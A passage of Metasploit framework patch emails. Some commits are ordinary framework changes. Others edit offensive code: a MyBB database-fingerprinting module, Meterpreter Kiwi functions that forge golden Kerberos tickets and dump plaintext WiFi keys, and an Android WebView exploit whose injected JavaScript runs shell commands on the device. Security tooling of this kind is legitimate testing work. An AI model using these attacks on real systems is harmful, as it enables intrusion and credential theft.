'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum']) + ], self.class) + end + + def check + begin + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + + end + + + def run + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + end +end From 3788f136d9aaf371c23772678fce314a3b157f95 Mon Sep 17 00:00:00 2001 From: silascutler Date: Tue, 1 Apr 2014 11:43:15 -0400 Subject: [PATCH 086/853] Update es_enum.rb Updated based on comments. --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index a44eea1cee..0e8735fdc5 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -33,8 +33,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', - 'version' => '1.0', - }, 10) + }) begin json_body = JSON.parse(res.body) @@ -54,8 +53,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Failed to save the result") end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable end end end From 1d46e65897a413b8e29737b21cbec0f9fa6dd1f3 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 2 Apr 2014 12:29:35 +1000 Subject: [PATCH 087/853] Update to match meterpreter changes This also includes the ability to specify id and groups for the golden ticket feature. --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 9 ++- .../post/meterpreter/extensions/kiwi/tlv.rb | 72 ++++++++++--------- .../ui/console/command_dispatcher/kiwi.rb | 12 +++- 3 files changed, 55 insertions(+), 38 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 8a5e7f2855..97a7eb635e 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -213,15 +213,22 @@ class Kiwi < Extension # @param domain [String] - Domain name. # @param sid [String] - SID of the domain. # @param tgt [String] - The kerberos ticket granting token. + # @param id [Integer] - ID of the user to grant the token for. + # @param group_ids [Array[Integer]] - IDs of the groups to assign to the user # # Returns [Array[Byte]] # - def golden_ticket_create(user, domain, sid, tgt) + def golden_ticket_create(user, domain, sid, tgt, id = 0, group_ids = []) request = Packet.create_request('kiwi_kerberos_golden_ticket_create') request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user) request.add_tlv(TLV_TYPE_KIWI_GOLD_DOMAIN, domain) request.add_tlv(TLV_TYPE_KIWI_GOLD_SID, sid) request.add_tlv(TLV_TYPE_KIWI_GOLD_TGT, tgt) + request.add_tlv(TLV_TYPE_KIWI_GOLD_USERID, id) + + group_ids.each do |g| + request.add_tlv(TLV_TYPE_KIWI_GOLD_GROUPID, g) + end response = client.send_request(request) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index ed40d8f99e..9c36f0baac 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -19,45 +19,47 @@ TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10 TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11) TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12) TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13) +TLV_TYPE_KIWI_GOLD_USERID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 14) +TLV_TYPE_KIWI_GOLD_GROUPID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 15) -TLV_TYPE_KIWI_LSA_VER_MAJ = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 15) -TLV_TYPE_KIWI_LSA_VER_MIN = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 16) -TLV_TYPE_KIWI_LSA_COMPNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 17) -TLV_TYPE_KIWI_LSA_SYSKEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 18) -TLV_TYPE_KIWI_LSA_KEYCOUNT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 19) -TLV_TYPE_KIWI_LSA_KEYID = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 20) -TLV_TYPE_KIWI_LSA_KEYIDX = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 21) -TLV_TYPE_KIWI_LSA_KEYVALUE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 22) -TLV_TYPE_KIWI_LSA_NT6KEY = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 23) -TLV_TYPE_KIWI_LSA_NT5KEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 24) +TLV_TYPE_KIWI_LSA_VER_MAJ = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 20) +TLV_TYPE_KIWI_LSA_VER_MIN = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 21) +TLV_TYPE_KIWI_LSA_COMPNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 22) +TLV_TYPE_KIWI_LSA_SYSKEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 23) +TLV_TYPE_KIWI_LSA_KEYCOUNT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 24) +TLV_TYPE_KIWI_LSA_KEYID = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 25) +TLV_TYPE_KIWI_LSA_KEYIDX = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 26) +TLV_TYPE_KIWI_LSA_KEYVALUE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 27) +TLV_TYPE_KIWI_LSA_NT6KEY = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 28) +TLV_TYPE_KIWI_LSA_NT5KEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 29) -TLV_TYPE_KIWI_LSA_SECRET = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 25) -TLV_TYPE_KIWI_LSA_SECRET_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 26) -TLV_TYPE_KIWI_LSA_SECRET_SERV = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 27) -TLV_TYPE_KIWI_LSA_SECRET_NTLM = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 28) -TLV_TYPE_KIWI_LSA_SECRET_CURR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 29) -TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 30) -TLV_TYPE_KIWI_LSA_SECRET_OLD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 31) -TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 32) +TLV_TYPE_KIWI_LSA_SECRET = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 35) +TLV_TYPE_KIWI_LSA_SECRET_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 36) +TLV_TYPE_KIWI_LSA_SECRET_SERV = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 37) +TLV_TYPE_KIWI_LSA_SECRET_NTLM = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 38) +TLV_TYPE_KIWI_LSA_SECRET_CURR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 39) +TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 40) +TLV_TYPE_KIWI_LSA_SECRET_OLD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 41) +TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 42) -TLV_TYPE_KIWI_LSA_SAM = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 33) -TLV_TYPE_KIWI_LSA_SAM_RID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 34) -TLV_TYPE_KIWI_LSA_SAM_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 35) -TLV_TYPE_KIWI_LSA_SAM_LMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 36) -TLV_TYPE_KIWI_LSA_SAM_NTLMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 37) +TLV_TYPE_KIWI_LSA_SAM = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 50) +TLV_TYPE_KIWI_LSA_SAM_RID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 51) +TLV_TYPE_KIWI_LSA_SAM_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 52) +TLV_TYPE_KIWI_LSA_SAM_LMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 53) +TLV_TYPE_KIWI_LSA_SAM_NTLMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 54) -TLV_TYPE_KIWI_KERB_EXPORT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 38) -TLV_TYPE_KIWI_KERB_TKT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 39) -TLV_TYPE_KIWI_KERB_TKT_ENCTYPE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 40) -TLV_TYPE_KIWI_KERB_TKT_START = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 41) -TLV_TYPE_KIWI_KERB_TKT_END = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 42) -TLV_TYPE_KIWI_KERB_TKT_MAXRENEW = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 43) -TLV_TYPE_KIWI_KERB_TKT_SERVERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 44) -TLV_TYPE_KIWI_KERB_TKT_SERVERREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 45) -TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 46) -TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 47) -TLV_TYPE_KIWI_KERB_TKT_FLAGS = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 48) -TLV_TYPE_KIWI_KERB_TKT_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 49) +TLV_TYPE_KIWI_KERB_EXPORT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 60) +TLV_TYPE_KIWI_KERB_TKT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 61) +TLV_TYPE_KIWI_KERB_TKT_ENCTYPE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 62) +TLV_TYPE_KIWI_KERB_TKT_START = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 63) +TLV_TYPE_KIWI_KERB_TKT_END = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 64) +TLV_TYPE_KIWI_KERB_TKT_MAXRENEW = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 65) +TLV_TYPE_KIWI_KERB_TKT_SERVERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 66) +TLV_TYPE_KIWI_KERB_TKT_SERVERREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 67) +TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 68) +TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 69) +TLV_TYPE_KIWI_KERB_TKT_FLAGS = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 70) +TLV_TYPE_KIWI_KERB_TKT_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 71) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 5af48e04bf..248e174987 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -143,6 +143,8 @@ class Console::CommandDispatcher::Kiwi @@golden_ticket_create_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner" ], "-u" => [ true, "Name of the user to create the ticket for" ], + "-i" => [ true, "ID of the user to associate the ticket with" ], + "-g" => [ true, "Comma-separated list of group identifiers to include (eg: 501,502)" ], "-d" => [ true, "Name of the target domain" ], "-k" => [ true, "Kerberos ticket granting token" ], "-t" => [ true, "Path of the file to store the ticket in" ], @@ -154,7 +156,7 @@ class Console::CommandDispatcher::Kiwi # def golden_ticket_create_usage print( - "\nUsage: kerberos_ticket_list [-h] -u -d -k -s -t \n\n" + + "\nUsage: kerberos_ticket_list [-h] -u -d -k -s [-i ] [-g -t \n\n" + "Create a golden kerberos ticket that expires in 10 years time.\n\n" + @@golden_ticket_create_opts.usage) end @@ -173,6 +175,8 @@ class Console::CommandDispatcher::Kiwi sid = nil tgt = nil target = nil + id = 0 + group_ids = [] @@golden_ticket_create_opts.parse(args) { |opt, idx, val| case opt @@ -184,6 +188,10 @@ class Console::CommandDispatcher::Kiwi tgt = val when "-t" target = val + when "-i" + id = val.to_i + when "-g" + group_ids = val.split(',').map { |g| g.to_i }.to_a when "-s" sid = val end @@ -195,7 +203,7 @@ class Console::CommandDispatcher::Kiwi return end - ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt) + ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt, id, group_ids) ::File.open( target, 'wb' ) do |f| f.write ticket From e61e5322232536659533f1785dd861d026ac5112 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 2 Apr 2014 17:16:40 +1000 Subject: [PATCH 088/853] Add support for extraction of wifi profile creds --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 44 ++++++++++++++++- .../post/meterpreter/extensions/kiwi/tlv.rb | 8 +++ .../ui/console/command_dispatcher/kiwi.rb | 49 ++++++++++++++++++- 3 files changed, 98 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 97a7eb635e..6f9b6d4282 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'rex/post/meterpreter/extensions/kiwi/tlv' -require 'csv' +require 'rexml/document' module Rex module Post @@ -231,8 +231,48 @@ class Kiwi < Extension end response = client.send_request(request) +return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) + end - return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) + # + # List all the wifi interfaces and the profiles associated + # with them. Also show the raw text passwords for each. + # + # Returns [Array[Hash]] + # + def wifi_list + request = Packet.create_request('kiwi_wifi_profile_list') + + response = client.send_request(request) + + results = [] + + response.each(TLV_TYPE_KIWI_WIFI_INT) do |i| + interface = { + :guid => Rex::Text::to_guid(i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_GUID)), + :desc => i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_DESC), + :state => i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_STATE), + :profiles => [] + } + + i.each(TLV_TYPE_KIWI_WIFI_PROFILE) do |p| + + xml = p.get_tlv_value(TLV_TYPE_KIWI_WIFI_PROFILE_XML) + doc = REXML::Document.new(xml) + profile = doc.elements['WLANProfile'] + + interface[:profiles] << { + :name => p.get_tlv_value(TLV_TYPE_KIWI_WIFI_PROFILE_NAME), + :auth => profile.elements['MSM/security/authEncryption/authentication'].text, + :key_type => profile.elements['MSM/security/sharedKey/keyType'].text, + :shared_key => profile.elements['MSM/security/sharedKey/keyMaterial'].text + } + end + + results << interface + end + + return results end # diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index 9c36f0baac..ff09f8a0b8 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -61,6 +61,14 @@ TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 69 TLV_TYPE_KIWI_KERB_TKT_FLAGS = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 70) TLV_TYPE_KIWI_KERB_TKT_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 71) +TLV_TYPE_KIWI_WIFI_INT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 75) +TLV_TYPE_KIWI_WIFI_INT_GUID = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 76) +TLV_TYPE_KIWI_WIFI_INT_STATE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 77) +TLV_TYPE_KIWI_WIFI_INT_DESC = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 78) +TLV_TYPE_KIWI_WIFI_PROFILE = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 79) +TLV_TYPE_KIWI_WIFI_PROFILE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 80) +TLV_TYPE_KIWI_WIFI_PROFILE_XML = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 81) + end end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 248e174987..3502931aa2 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -69,7 +69,8 @@ class Console::CommandDispatcher::Kiwi "kerberos_ticket_use" => "Use a kerberos ticket", "kerberos_ticket_purge" => "Purge any in-use kerberos tickets", "kerberos_ticket_list" => "List all kerberos tickets", - "lsa_dump" => "Dump LSA secrets" + "lsa_dump" => "Dump LSA secrets", + "wifi_list" => "List wifi profiles/creds" } end @@ -327,6 +328,52 @@ class Console::CommandDispatcher::Kiwi print_good("Kerberos ticket applied successfully") end + def wifi_list_usage + print( + "\nUsage: wifi_list\n\n" + + "List WiFi interfaces, profiles and passwords.\n\n") + end + + # + # Dump all the wifi profiles/credentials + # + def cmd_wifi_list(*args) + # if any arguments are specified, then fire up a usage message + if args.length > 0 + wifi_list_usage + return + end + + results = client.kiwi.wifi_list + + if results.length > 0 + results.each do |r| + table = Rex::Ui::Text::Table.new( + 'Header' => "#{r[:desc]} - #{r[:guid]}", + 'Indent' => 0, + 'SortIndex' => 0, + 'Columns' => [ + 'Name', 'Auth', 'Type', 'Shared Key' + ] + ) + + print_line + r[:profiles].each do |p| + table << [p[:name], p[:auth], p[:key_type], p[:shared_key]] + end + + print_line table.to_s + print_line "State: #{r[:state]}" + end + else + print_line + print_error("No wireless profiles found on the target.") + end + + print_line + return true + end + # # Dump all the possible credentials to screen. # From 4bf6481242f19cad211d4a5a3f46c30d2e596e7e Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Wed, 2 Apr 2014 23:51:33 +0200 Subject: [PATCH 089/853] Added regex option to validate options --- lib/msf/core/option_container.rb | 33 ++++++++++++++++++++- modules/auxiliary/fuzzers/ftp/client_ftp.rb | 2 +- 2 files changed, 33 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/option_container.rb b/lib/msf/core/option_container.rb index d3b7901ca5..9283f1e3e3 100644 --- a/lib/msf/core/option_container.rb +++ b/lib/msf/core/option_container.rb @@ -20,6 +20,7 @@ class OptBase # attrs[1] = description (string) # attrs[2] = default value # attrs[3] = possible enum values + # attrs[4] = Regex to validate the option # def initialize(in_name, attrs = []) self.name = in_name @@ -29,6 +30,21 @@ class OptBase self.desc = attrs[1] self.default = attrs[2] self.enums = [ *(attrs[3]) ].map { |x| x.to_s } + regex_temp = attrs[4] || nil + if regex_temp + # convert to string + regex_temp = regex_temp.to_s if regex_temp.is_a? Regexp + # remove start and end character, they will be added later + regex_temp = regex_temp.sub(/^\^/, '').sub(/\$$/, '') + # Add start and end marker to match the whole regex + regex_temp = "^#{regex_temp}$" + begin + Regexp.compile(regex_temp) + self.regex = regex_temp + rescue RegexpError, TypeError => e + raise("Invalid Regex #{regex_temp}: #{e}") + end + end end # @@ -63,7 +79,18 @@ class OptBase # If it's required and the value is nil or empty, then it's not valid. # def valid?(value) - return (required? and (value == nil or value.to_s.empty?)) ? false : true + if required? + # required variable not set + return false if (value == nil or value.to_s.empty?) + end + if regex + if value.match(regex) + return true + else + return false + end + end + return true end # @@ -125,6 +152,10 @@ class OptBase # The list of potential valid values # attr_accessor :enums + # + # A optional regex to validate the option value + # + attr_accessor :regex protected diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index e1819f6a0e..0642f67b20 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 21 ]), - OptString.new('FUZZCMDS', [ true, "Comma separated list of commands to fuzz.", "LIST,NLST,LS,RETR" ]), + OptString.new('FUZZCMDS', [ true, "Comma separated list of commands to fuzz (Uppercase).", "LIST,NLST,LS,RETR", nil, /(?:[A-Z]+,?)+/ ]), OptInt.new('STARTSIZE', [ true, "Fuzzing string startsize.",1000]), OptInt.new('ENDSIZE', [ true, "Max Fuzzing string size.",200000]), OptInt.new('STEPSIZE', [ true, "Increment fuzzing string each attempt.",1000]), From 176cc848653637bb2c53bf7e77d5e78557e75e51 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 2 Apr 2014 17:21:13 -0500 Subject: [PATCH 090/853] Remove BES and calculate the pid manually. --- .../browser/webview_addjavascriptinterface.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index cab66ca0f4..6b6c6fc8b4 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -7,7 +7,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - include Msf::Exploit::Remote::BrowserExploitServer + include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ @@ -77,15 +77,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Serving javascript") send_response(cli, js, 'Content-type' => 'text/javascript') else - super + print_status("Serving exploit HTML") + send_response_html(cli, html) end end - def on_request_exploit(cli, req, browser) - print_status("Serving exploit HTML") - send_response_html(cli, html) - end - def ndkstager(stagename) localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so') data = File.read(localfile, :mode => 'rb') @@ -99,6 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote // ensure that the object contains a native interface try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } + // get the pid + var pid = obj.getClass().forName('android.os.Process').getMethod('myPid', null).invoke(null, null); + // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); var runtime = m.invoke(null, null); @@ -106,9 +105,10 @@ class Metasploit3 < Msf::Exploit::Remote var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}"; // get the process name, which will give us our data path - var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); + // $PPID does not seem to work on android 4.0, so we concat pids manually + var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); var ch, path = '/data/data/'; - while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } + while ((ch = p.getInputStream().read()) >= 0) { path += String.fromCharCode(ch); } var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; var dexPath = path + '/#{stagename}.dex'; From 7d93d28f1ded2f36807a467a8f4957e70cf91f46 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 2 Apr 2014 21:57:17 -0400 Subject: [PATCH 091/853] Support more tab completion features --- lib/msf/ui/console/command_dispatcher/core.rb | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index fcd294fa6c..9e42ec66fc 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2033,6 +2033,11 @@ class Core end end + unless str.blank? + res = res.select { |term| term.upcase.start_with?(str.upcase) } + res = res.map { |term| str << term[str.length..-1] } + end + return res end @@ -2737,6 +2742,8 @@ class Core p = framework.payloads.create(mod.datastore['PAYLOAD']) if (p and p.options.include?(opt)) res.concat(option_values_dispatch(p.options[opt], str, words)) + elsif (p and p.options.include?(opt.upcase)) + res.concat(option_values_dispatch(p.options[opt.upcase], str, words)) end end @@ -2770,8 +2777,10 @@ class Core end when 'Msf::OptAddressRange' - case str + when /^file:(.*)/ + files = tab_complete_filenames($1,words) + res += files.map { |f| "file:" << f } if files when /\/$/ res << str+'32' res << str+'24' @@ -2802,9 +2811,20 @@ class Core o.enums.each do |val| res << val end + when 'Msf::OptPath' files = tab_complete_filenames(str,words) res += files if files + + when 'Msf::OptBool' + res << 'true' + res << 'false' + + when 'Msf::OptString' + if (str =~ /^file:(.*)/) + files = tab_complete_filenames($1,words) + res += files.map { |f| "file:" << f } if files + end end return res From 55500ea2f33a78b0c56966059709c7d2349fd008 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 2 Apr 2014 21:53:12 -0500 Subject: [PATCH 092/853] Avoid the nullchar. --- .../exploits/android/browser/webview_addjavascriptinterface.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 6b6c6fc8b4..ec69512a81 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote // $PPID does not seem to work on android 4.0, 